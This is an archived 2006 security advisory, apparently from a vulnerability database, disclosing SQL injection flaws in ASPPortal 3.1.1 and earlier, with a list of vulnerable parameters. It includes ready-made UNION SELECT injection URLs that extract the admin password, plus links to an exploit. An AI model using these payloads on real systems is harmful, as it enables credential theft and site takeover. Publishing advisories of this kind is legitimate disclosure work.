Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11891
HistoryMar 22, 2006 - 12:00 a.m.

ASPPortal <= 3.1.1 Multiple Remote SQL Injection Vulnerabilities

2006-03-2200:00:00
vulners.com
17

–Security Report–
Advisory: ASPPortal <= 3.1.1 Multiple Remote SQL Injection Vulnerabilities

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 20/03/06 11:14 PM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: ASPPortal (http://www.ASPPortal.net/&#41;
Version: 3.1.1 and prior versions must be affected.
About: There is lots of SQL injections in modules of ASPPortal via this methods
remote attacker can inject arbitrary
SQL queries.In below i included some with their examples and also coded exploit
for second one exploit decrypts password
which comes from SQL injection too, Because ASPPortal has it own crypting
mechanism.As you can see in downloads module
page download_click.asp's downloadid parameter and news module page
News_Item.asp's content_ID parameter did not sanitized
properly.Also there is some SQL injections in admin panel but for using them you
need admin access.You can found them in below
as ADMINGET and ADMINPOST tags.
Level: Critical

How&Example:
GET ->
http://[site]/apdir/content/downloads/download_click.asp?downloadid=[SQLCode]
GET -> http://[site]/apdir/content/news/News_Item.asp?content_ID=[SQLCode]
Example ->
http://[site]/apdir/content/downloads/download_click.asp?downloadid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,
password+FROM+users+where+username='admin'
Example ->
http://[site]/apdir/content/news/News_Item.asp?content_ID=-1+UNION+SELECT+username,password,0,0,
group_id,email,0,0,0,0,0,0,0,0,0,0+FROM+users+where+username='admin'
With this examples remote attacker could get admin's pass and can login from
/content/users/login.asp
ADMINGET ->
http://[site]/apdir/content/users/add_edit_user.asp?page_type=2&user_id=[SQLCode]
ADMINGET ->
http://[site]/apdir/content/banner_adds/banner_add_edit.asp?pagetype=2&bannerid=[SQLCode]
ADMINGET ->
http://[site]/apdir/content/categories/add_edit_cat.asp?page_type=2&cat_id=[SQLCode]
ADMINGET ->
http://[site]/apdir/content/News/add_edit_news.asp?page_type=2&Content_ID=[SQLCode]
ADMINGET ->
http://[site]/apdir/content/downloads/add_edit_download.asp?page_type=2&download_id=[SQLCode]
ADMINGET ->
http://[site]/apdir/content/poll/add_edit_poll.asp?page_type=2&Poll_ID=[SQLCode]
ADMINGET ->
http://[site]/apdir/content/contactus/contactus_add_edit.asp?contactid=[SQLCode]&pageid=2
ADMINGET ->
http://[site]/apdir/content/poll/poll_list.asp?sortby=[SQLCode]&page_no=1
ADMINPOST ->
http://[site]/apdir/content/downloads/add_edit_download.asp?page_type=1

Timeline:

  • 20/03/2006: Vulnerability found.
  • 20/03/2006: Contacted with vendor and waiting reply.

Exploit:
http://www.nukedx.com/?getxpl=21

References:
http://www.milw0rm.com/id.php?id=1597

Original advisory can be found at: http://www.nukedx.com/?viewdoc=21